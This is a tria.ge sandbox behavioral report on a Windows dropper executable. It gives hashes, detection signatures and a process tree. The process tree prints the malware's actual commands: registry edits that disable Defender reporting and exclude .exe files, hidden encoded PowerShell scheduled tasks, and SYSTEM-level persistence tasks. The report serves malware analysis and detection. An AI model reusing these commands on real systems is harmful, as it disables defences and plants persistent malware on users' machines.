Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231201-en -
resource tags
arch:x64arch:x86image:win10v2004-20231201-enlocale:en-usos:windows10-2004-x64system -
submitted
11/12/2023, 03:12
Static task
static1
Behavioral task
behavioral1
Sample
e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe
Resource
win7-20231020-en
General
-
Target
e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe
-
Size
7.2MB
-
MD5
ce3185730246203700a23e2bca796d99
-
SHA1
0df5c4d7f5352dbe6ffedf575282f09faedf788f
-
SHA256
e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8
-
SHA512
ce19257d2e6187e3071253b869f62dd119b52425ff58a46c8a644831d01d4652124f0323653a96703929b2a5bafcc2392d2102397cbf8cfc321e859126b8d8c2
-
SSDEEP
196608:91Orab2X1JKmRNu34cJcyd8/1cj+b3Y6pR0c9zw3Zzxaq:3Or2M1JKIuLJJdacw3Y6pR0cuf
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 138 4216 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Control Panel\International\Geo\Nation kihxzCQ.exe -
Executes dropped EXE 4 IoCs
pid Process 2324 Install.exe 5100 Install.exe 540 hFQYnRo.exe 4536 kihxzCQ.exe -
Loads dropped DLL 1 IoCs
pid Process 4216 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json kihxzCQ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json kihxzCQ.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini kihxzCQ.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_C7CF4FA7BCF717E50C9341D69112D7D7 kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_F134D707C209C83E02D4485138FE5D48 kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_F134D707C209C83E02D4485138FE5D48 kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_9FBD3BA6168F3C4317F2AAB1E548FE96 kihxzCQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol hFQYnRo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 kihxzCQ.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini hFQYnRo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Conhost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\49C555742982D57C7C177BAF9E010F56 kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\49C555742982D57C7C177BAF9E010F56 kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_9FBD3BA6168F3C4317F2AAB1E548FE96 kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_C7CF4FA7BCF717E50C9341D69112D7D7 kihxzCQ.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE kihxzCQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 kihxzCQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache kihxzCQ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol kihxzCQ.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\hlHvxOmTEzGU2\OXIeBaEYyesMI.dll kihxzCQ.exe File created C:\Program Files (x86)\DDDIXrwIFTXkC\XFXgLrP.xml kihxzCQ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi kihxzCQ.exe File created C:\Program Files (x86)\zYDdeyryU\iIidkyK.xml kihxzCQ.exe File created C:\Program Files (x86)\hlHvxOmTEzGU2\VNGHZNM.xml kihxzCQ.exe File created C:\Program Files (x86)\UJbqbYGEalpLkUITJzR\PxrQfRp.dll kihxzCQ.exe File created C:\Program Files (x86)\UJbqbYGEalpLkUITJzR\IdGbxrm.xml kihxzCQ.exe File created C:\Program Files (x86)\cvlBDCdIHRUn\fSUIaaA.dll kihxzCQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi kihxzCQ.exe File created C:\Program Files (x86)\zYDdeyryU\XeaYeM.dll kihxzCQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak kihxzCQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja kihxzCQ.exe File created C:\Program Files (x86)\DDDIXrwIFTXkC\ZXjqWYP.dll kihxzCQ.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak kihxzCQ.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\btngLezmYLEbkDGphz.job Conhost.exe File created C:\Windows\Tasks\qxdnhmFGwPNMbPaLO.job Conhost.exe File created C:\Windows\Tasks\VgITaIvscZwKwBA.job schtasks.exe File created C:\Windows\Tasks\CJutnrVhMflOHRfra.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1840 schtasks.exe 2928 schtasks.exe 1624 schtasks.exe 3228 schtasks.exe 2988 schtasks.exe 1188 schtasks.exe 3876 schtasks.exe 3024 schtasks.exe 836 schtasks.exe 1496 schtasks.exe 3664 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume kihxzCQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" kihxzCQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates Conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" kihxzCQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kihxzCQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket kihxzCQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kihxzCQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kihxzCQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer kihxzCQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kihxzCQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{67bb8cb2-0000-0000-0000-d01200000000} kihxzCQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kihxzCQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs Conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" kihxzCQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs Conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{67bb8cb2-0000-0000-0000-d01200000000}\NukeOnDelete = "0" kihxzCQ.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 3940 powershell.EXE 3940 powershell.EXE 3940 powershell.EXE 968 powershell.exe 968 powershell.exe 968 powershell.exe 1060 Conhost.exe 1060 Conhost.exe 1060 Conhost.exe 3460 powershell.EXE 3460 powershell.EXE 3460 powershell.EXE 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe 4536 kihxzCQ.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3940 powershell.EXE Token: SeDebugPrivilege 968 powershell.exe Token: SeDebugPrivilege 1060 Conhost.exe Token: SeDebugPrivilege 3460 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4836 wrote to memory of 2324 4836 e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe 90 PID 4836 wrote to memory of 2324 4836 e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe 90 PID 4836 wrote to memory of 2324 4836 e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe 90 PID 2324 wrote to memory of 5100 2324 Install.exe 91 PID 2324 wrote to memory of 5100 2324 Install.exe 91 PID 2324 wrote to memory of 5100 2324 Install.exe 91 PID 5100 wrote to memory of 2896 5100 Install.exe 236 PID 5100 wrote to memory of 2896 5100 Install.exe 236 PID 5100 wrote to memory of 2896 5100 Install.exe 236 PID 5100 wrote to memory of 4920 5100 Install.exe 216 PID 5100 wrote to memory of 4920 5100 Install.exe 216 PID 5100 wrote to memory of 4920 5100 Install.exe 216 PID 2896 wrote to memory of 2472 2896 cmd.exe 95 PID 2896 wrote to memory of 2472 2896 cmd.exe 95 PID 2896 wrote to memory of 2472 2896 cmd.exe 95 PID 4920 wrote to memory of 556 4920 schtasks.exe 100 PID 4920 wrote to memory of 556 4920 schtasks.exe 100 PID 4920 wrote to memory of 556 4920 schtasks.exe 100 PID 2472 wrote to memory of 516 2472 cmd.exe 99 PID 2472 wrote to memory of 516 2472 cmd.exe 99 PID 2472 wrote to memory of 516 2472 cmd.exe 99 PID 556 wrote to memory of 836 556 cmd.exe 219 PID 556 wrote to memory of 836 556 cmd.exe 219 PID 556 wrote to memory of 836 556 cmd.exe 219 PID 2472 wrote to memory of 1428 2472 cmd.exe 97 PID 2472 wrote to memory of 1428 2472 cmd.exe 97 PID 2472 wrote to memory of 1428 2472 cmd.exe 97 PID 556 wrote to memory of 5064 556 cmd.exe 96 PID 556 wrote to memory of 5064 556 cmd.exe 96 PID 556 wrote to memory of 5064 556 cmd.exe 96 PID 5100 wrote to memory of 1624 5100 Install.exe 117 PID 5100 wrote to memory of 1624 5100 Install.exe 117 PID 5100 wrote to memory of 1624 5100 Install.exe 117 PID 5100 wrote to memory of 2928 5100 Install.exe 228 PID 5100 wrote to memory of 2928 5100 Install.exe 228 PID 5100 wrote to memory of 2928 5100 Install.exe 228 PID 3940 wrote to memory of 4000 3940 powershell.EXE 134 PID 3940 wrote to memory of 4000 3940 powershell.EXE 134 PID 5100 wrote to memory of 4016 5100 Install.exe 127 PID 5100 wrote to memory of 4016 5100 Install.exe 127 PID 5100 wrote to memory of 4016 5100 Install.exe 127 PID 5100 wrote to memory of 3024 5100 Install.exe 227 PID 5100 wrote to memory of 3024 5100 Install.exe 227 PID 5100 wrote to memory of 3024 5100 Install.exe 227 PID 540 wrote to memory of 968 540 hFQYnRo.exe 131 PID 540 wrote to memory of 968 540 hFQYnRo.exe 131 PID 540 wrote to memory of 968 540 hFQYnRo.exe 131 PID 968 wrote to memory of 3692 968 powershell.exe 195 PID 968 wrote to memory of 3692 968 powershell.exe 195 PID 968 wrote to memory of 3692 968 powershell.exe 195 PID 3692 wrote to memory of 4500 3692 cmd.exe 194 PID 3692 wrote to memory of 4500 3692 cmd.exe 194 PID 3692 wrote to memory of 4500 3692 cmd.exe 194 PID 968 wrote to memory of 1012 968 powershell.exe 193 PID 968 wrote to memory of 1012 968 powershell.exe 193 PID 968 wrote to memory of 1012 968 powershell.exe 193 PID 968 wrote to memory of 4700 968 powershell.exe 192 PID 968 wrote to memory of 4700 968 powershell.exe 192 PID 968 wrote to memory of 4700 968 powershell.exe 192 PID 968 wrote to memory of 1164 968 powershell.exe 132 PID 968 wrote to memory of 1164 968 powershell.exe 132 PID 968 wrote to memory of 1164 968 powershell.exe 132 PID 968 wrote to memory of 1856 968 powershell.exe 191 PID 968 wrote to memory of 1856 968 powershell.exe 191
Processes
-
C:\Users\Admin\AppData\Local\Temp\e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe"C:\Users\Admin\AppData\Local\Temp\e991d5b543767bccfbee554ebcfbdb87c90fc10f0f9230d49089e27d280558f8.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Users\Admin\AppData\Local\Temp\7zS4314.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Users\Admin\AppData\Local\Temp\7zS4546.tmp\Install.exe.\Install.exe /MmqydidDY "525403" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵PID:4920
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:556
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵PID:2896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gdSwTFDNA"4⤵PID:2928
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Drops file in Windows directory
PID:3024
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdSwTFDNA" /SC once /ST 00:10:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btngLezmYLEbkDGphz" /SC once /ST 03:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\hFQYnRo.exe\" Bp /mDsite_idngL 525403 /S" /V1 /F4⤵
- Creates scheduled task(s)
PID:3024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gdSwTFDNA"4⤵PID:4016
-
-
-
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&1⤵
- Suspicious use of WriteProcessMemory
PID:2472 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:642⤵PID:1428
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:322⤵PID:516
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:641⤵PID:5064
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:321⤵PID:836
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4000
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2084
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4128
-
C:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\hFQYnRo.exeC:\Users\Admin\AppData\Local\Temp\jdyPdRrHtWvLsYfgt\EegACLSUUqqFDxe\hFQYnRo.exe Bp /mDsite_idngL 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:540 -
